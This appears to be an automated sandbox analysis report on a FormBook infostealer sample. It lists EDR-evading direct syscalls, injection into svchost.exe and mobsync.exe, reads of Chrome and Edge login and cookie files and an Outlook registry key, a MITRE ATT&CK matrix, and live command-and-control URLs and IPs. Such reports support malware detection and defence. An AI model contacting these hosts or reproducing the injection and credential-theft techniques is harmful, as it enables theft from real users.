HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mobsync.exe

Thread register set: target process: 6448

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\mobsync.exe

Thread APC queued: target process: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2D6E008

Jump to behavior

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006E87B1 LogonUserW,

0_2_006E87B1

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_00693B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00693B3A

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006948D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_006948D7

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006F4C7F mouse_event,

0_2_006F4C7F

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\tfWjjV1LdT.exe"	Jump to behavior
Source: C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006E7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_006E7CAF

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006E874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_006E874B

Source: tfWjjV1LdT.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: tfWjjV1LdT.exe, ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: ldZEVEbpOrO.exe, 00000004.00000000.2230036275.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000004.00000002.3896367594.0000000001B11000.00000002.00000001.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000000.2382437884.0000000000E21000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006B862B cpuid

0_2_006B862B

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006C4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_006C4E87

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006D1E06 GetUserNameW,

0_2_006D1E06

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006C3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_006C3F3A

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe

Code function: 0_2_006949A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_006949A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mobsync.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: tfWjjV1LdT.exe	Binary or memory string: WIN_81
Source: tfWjjV1LdT.exe	Binary or memory string: WIN_XP
Source: tfWjjV1LdT.exe	Binary or memory string: WIN_XPe
Source: tfWjjV1LdT.exe	Binary or memory string: WIN_VISTA
Source: tfWjjV1LdT.exe	Binary or memory string: WIN_7
Source: tfWjjV1LdT.exe	Binary or memory string: WIN_8
Source: tfWjjV1LdT.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2308790702.0000000005B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3895579056.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896453631.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3896511474.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3896622402.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2307717085.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2308275736.0000000003BE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00706283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00706283
Source: C:\Users\user\Desktop\tfWjjV1LdT.exe	Code function: 0_2_00706747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00706747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tfWjjV1LdT.exe	54%	Virustotal		Browse
tfWjjV1LdT.exe	55%	ReversingLabs	Win32.Trojan.AutoitInject
tfWjjV1LdT.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==	0%	Avira URL Cloud	safe
http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwR	0%	Avira URL Cloud	safe
http://www.aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm	100%	Avira URL Cloud	malware
http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm	0%	Avira URL Cloud	safe
http://www.canadavinreport.site/g3h7/	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop	0%	Avira URL Cloud	safe
http://www.litespeedtech.com/error-page	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXm	0%	Avira URL Cloud	safe
http://www.zkdamdjj.shop/kf1m/	0%	Avira URL Cloud	safe
http://www.logidant.xyz/iuvu/	0%	Avira URL Cloud	safe
http://www.izmirescortg.xyz/lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm	0%	Avira URL Cloud	safe
http://www.laohub10.net/36be/	0%	Avira URL Cloud	safe
http://www.logidant.xyz/iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXm	0%	Avira URL Cloud	safe
http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW	0%	Avira URL Cloud	safe
http://www.laohub10.net/36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXm	0%	Avira URL Cloud	safe
http://www.aballanet.cat/6xrr/	100%	Avira URL Cloud	malware
http://www.yunlekeji.top/t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg==	0%	Avira URL Cloud	safe
http://www.yunlekeji.top/t322/	0%	Avira URL Cloud	safe
http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a	100%	Avira URL Cloud	malware
http://www.madhf.tech/0mwe/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.izmirescortg.xyz	104.21.36.62	true	false	high
www.madhf.tech	103.224.182.242	true	false	high
fap-a13f5c64.faipod.com	165.154.96.210	true	false	unknown
r0lqcud7.nbnnn.xyz	27.124.4.246	true	false	high
logidant.xyz	45.141.156.114	true	true	unknown
www.zkdamdjj.shop	188.114.96.3	true	false	high
www.canadavinreport.site	185.27.134.206	true	false	high
aballanet.cat	134.0.14.158	true	true	unknown
www.logidant.xyz	unknown	unknown	true	unknown
www.laohub10.net	unknown	unknown	false	high
www.aballanet.cat	unknown	unknown	false	unknown
www.yunlekeji.top	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&Kdr=RN-HMNoXj6pXm	true	Avira URL Cloud: malware	unknown
http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==	false	Avira URL Cloud: safe	unknown
http://www.canadavinreport.site/g3h7/	false	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/kf1m/?KBEhCJ=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&Kdr=RN-HMNoXj6pXm	false	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/iuvu/	false	Avira URL Cloud: safe	unknown
http://www.zkdamdjj.shop/kf1m/	false	Avira URL Cloud: safe	unknown
http://www.izmirescortg.xyz/lnl7/?KBEhCJ=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&Kdr=RN-HMNoXj6pXm	false	Avira URL Cloud: safe	unknown
http://www.yunlekeji.top/t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg==	false	Avira URL Cloud: safe	unknown
http://www.aballanet.cat/6xrr/	true	Avira URL Cloud: malware	unknown
http://www.laohub10.net/36be/	false	Avira URL Cloud: safe	unknown
